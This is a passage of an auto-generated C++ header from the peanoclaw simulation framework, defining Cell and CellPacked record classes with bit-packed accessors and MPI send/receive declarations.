#ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (DIMENSIONS + 3); _persistentRecords._packedRecords0 = static_cast<short int>( cellIsAForkCandidate ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif defined(Parallel) && defined(Debug) && !defined(SharedMemoryParallelisation) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; int _level; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; bool _cellIsAForkCandidate; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellIsAForkCandidate = cellIsAForkCandidate; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellIsAForkCandidate = cellIsAForkCandidate; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; int _level; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS | cellIsAForkCandidate | startbit DIMENSIONS + 3 | #bits 1 */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << 